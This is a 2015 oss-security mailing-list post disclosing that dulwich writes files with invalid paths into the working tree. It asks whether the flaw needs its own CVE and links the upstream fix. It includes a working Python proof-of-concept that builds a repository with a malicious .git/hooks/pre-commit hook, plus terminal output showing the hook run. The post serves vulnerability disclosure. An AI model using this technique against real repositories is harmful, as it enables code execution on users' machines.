Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Sat, 21 Mar 2015 10:26:24 +0100
From: Salvatore Bonaccorso <carnil@...ian.org>
To: OSS Security Mailinglist <oss-security@...ts.openwall.com>
Cc: CVE Assignments MITRE <cve-assign@...re.org>,
	Jelmer Vernooij <jelmer@...ian.org>
Subject: Possible CVE Request: dulwich: does not prevent to write files in
 commits with invalid paths to working tree

Hi,

While looking at CVE-2014-9390 I noticed
https://lists.launchpad.net/dulwich-users/msg00827.html for dulwich reported by
Gary van der Merwe. Does the scope of CVE-2014-9390 also include these bits
from the above:

dulwich happily clones a repository which contains commit with invalid
paths, say .git/hooks/pre-commit, and thus allowing execution of code
on subsequent commits.

----cut---------cut---------cut---------cut---------cut---------cut-----
dummy@...:~$ python PoC.py 
dummy@...:~$ dulwich clone PoC.git foo
Counting objects: 5, done.
Compressing objects: 100% (2/2), done.
Total 5 (delta 0), reused 5 (delta 0)
Checking out HEADdummy@...:~$ cd foo/
dummy@...:~/foo$ git commit -m "test" --allow-empty
You just got cracked! (not really but you could have been!)
[master 9588153] test
dummy@...:~/foo$ ls -l /tmp/cracked 
-rw-r--r-- 1 dummy dummy 0 Mar 21 10:24 /tmp/cracked
dummy@...:~/foo$
----cut---------cut---------cut---------cut---------cut---------cut-----

Upstream (Jelmer Vernooij) has fixed this with commit

https://git.samba.org/?p=jelmer/dulwich.git;a=commitdiff;h=091638be3c89f46f42c3b1d57dc1504af5729176

Does this need a separate CVE from CVE-2014-9390? 

Regards,
Salvatore

#!/usr/bin/env python2

import os
import time

from dulwich.repo import Repo
from dulwich.objects import Blob, Tree, Commit,  parse_timezone

repo_dir = 'PoC.git'
os.mkdir(repo_dir)
repo = Repo.init_bare(repo_dir)

evil_file = Blob.from_string("""#!/usr/bin/env python
import subprocess
subprocess.call(["/bin/touch", "/tmp/cracked"])
print('You just got cracked! (not really but you could have been!)')
""")

hooks_tree = Tree()
hooks_tree.add('pre-commit', 0o100755, evil_file.id)

git_tree = Tree()
git_tree.add('hooks', 0o40000, hooks_tree.id)

root_tree = Tree()
root_tree.add('.git', 0o40000, git_tree.id)

commit = Commit()
commit.tree = root_tree.id
author = "Dr. Evil <drevil@...xxxxxxxx>"
commit.author = commit.committer = author
commit.commit_time = commit.author_time = int(time.time())
tz = parse_timezone('-0200')[0]
commit.commit_timezone = commit.author_timezone = tz
commit.encoding = "UTF-8"
commit.message = "Evil commit"

repo.object_store.add_objects([
    (evil_file, None),
    (hooks_tree, None),
    (git_tree, None),
    (root_tree, None),
    (commit, None),
])

repo.refs['refs/heads/master'] = commit.id

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ